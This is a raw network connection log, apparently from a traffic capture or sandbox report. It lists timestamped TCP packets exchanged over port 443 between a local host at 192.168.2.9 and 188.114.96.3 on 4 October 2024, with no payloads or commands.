Oct 4, 2024 11:23:30.255776882 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255814075 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.334234953 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.334374905 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.334403038 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.334431887 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.334448099 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.334498882 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.334702015 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335171938 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335222006 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.335227966 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335484028 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335530043 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.335536003 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335576057 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.335664034 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.335711956 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.336410999 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.336463928 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.336654902 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.336704969 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.336905956 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.336952925 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.337505102 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.337567091 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.341607094 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.341690063 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.342020035 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.342077017 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.342466116 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.342525959 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.342679977 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.342714071 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.342730999 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.342739105 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.342756033 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.343745947 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.343796015 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.343801975 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.343842030 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.458992958 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459049940 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459085941 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459101915 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459145069 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459162951 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459336042 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459398985 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459405899 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459417105 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459439993 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459459066 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459887028 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459928036 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459945917 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.459958076 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.459978104 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460000992 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.460026026 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.460031033 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460529089 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460576057 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460587978 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.460596085 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460609913 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460633993 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.460639954 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.460654974 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.460671902 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.461477041 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461539030 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.461568117 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461615086 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461617947 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.461627007 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461652040 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.461658001 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461698055 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.461704969 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.461736917 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.465949059 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466029882 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.466167927 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466202974 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466224909 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.466232061 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466250896 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.466633081 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466667891 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466697931 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.466705084 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.466717005 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.468961954 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.468998909 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.469018936 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.469029903 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.469053030 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.469350100 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.469402075 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.469408035 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.469468117 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.539666891 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.539777994 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.539823055 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.539840937 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.539869070 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.539884090 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.542742968 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.542830944 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.542870998 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.542924881 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.543179035 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.543243885 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.543658972 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.543706894 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.543730974 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.543740034 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.543767929 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.543782949 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.545625925 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.545676947 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.545715094 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.545722961 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.545766115 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.546437025 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.546478987 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.546509981 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.546519041 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.546550989 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.546571970 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.553347111 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.553392887 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.553445101 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.553455114 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.553482056 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.553503036 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.554054976 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.554234982 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.554991961 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.555049896 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.555082083 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.555088997 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.555107117 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.555126905 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.629611969 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.629667044 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.629842997 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.629842997 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.629859924 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.629916906 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.631616116 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.631663084 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.631702900 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.631711960 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.631737947 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.631755114 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.633927107 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.633969069 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.634001970 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.634010077 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.634042025 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.634061098 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.635065079 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.635107040 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.635134935 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.635142088 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.635166883 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.635184050 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.636317968 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.636363983 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.636401892 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.636409998 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.636432886 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.636455059 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.640100956 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.640145063 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.640182018 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.640188932 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.640250921 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.640259027 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.641669035 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.641710997 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.641740084 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.641746044 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.641772985 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.641789913 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.642826080 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.642869949 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.642890930 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.642896891 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.642920971 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.642939091 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.719485044 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.719530106 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.719625950 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.719650984 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.719789028 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.719789028 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.721417904 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721451998 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721496105 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.721510887 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721530914 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721539021 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.721560001 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.721571922 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721595049 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.721595049 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.721632957 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.722775936 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.722804070 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.722830057 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.722839117 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.722858906 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.722882986 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.725730896 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.725775003 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.725802898 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.725816965 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.725841999 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.725862980 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.730413914 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.730463028 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.730518103 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.730532885 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.730560064 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.730580091 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.731276989 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.731333017 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.731352091 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.731368065 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.731391907 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.731405020 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.804028988 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.804050922 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.804158926 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.804177046 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.804244041 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.805213928 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.805228949 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.805289030 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.805296898 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.805337906 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.806962967 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.806976080 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.807029009 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.807037115 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.807075024 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.808131933 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.808145046 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.808197975 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.808203936 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.808237076 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.809220076 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.809232950 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.809288025 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.809298992 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.809338093 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.812866926 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.812880039 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.812936068 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.812949896 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.812993050 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.815220118 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.815234900 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.815310001 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.815325022 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.815370083 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.816675901 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.816692114 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.816749096 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.816752911 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.816792011 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.890064955 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.890156984 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.890187979 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.890249968 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.891930103 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.891977072 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.891995907 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.892019033 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.892040968 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.892071009 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.894510984 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.894557953 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.894588947 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.894598007 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.894620895 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.894645929 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.896112919 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.896153927 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.896183968 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.896190882 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.896212101 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.896239042 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.897283077 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.897325039 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.897347927 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.897357941 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.897377968 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.897402048 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.900408983 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.900453091 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.900475025 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.900482893 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.900506020 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.900528908 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.902631998 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.902687073 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.902719975 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.902725935 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.902751923 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.902771950 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.904144049 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.904186010 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.904217958 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.904225111 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.904258013 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.904278040 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.977758884 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.977808952 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.977993965 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.977993965 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.978017092 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.978055000 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.980077982 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.980091095 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.980143070 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.980159998 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.980196953 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.981806040 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.981821060 CEST	443	49709	188.114.96.3	192.168.2.9
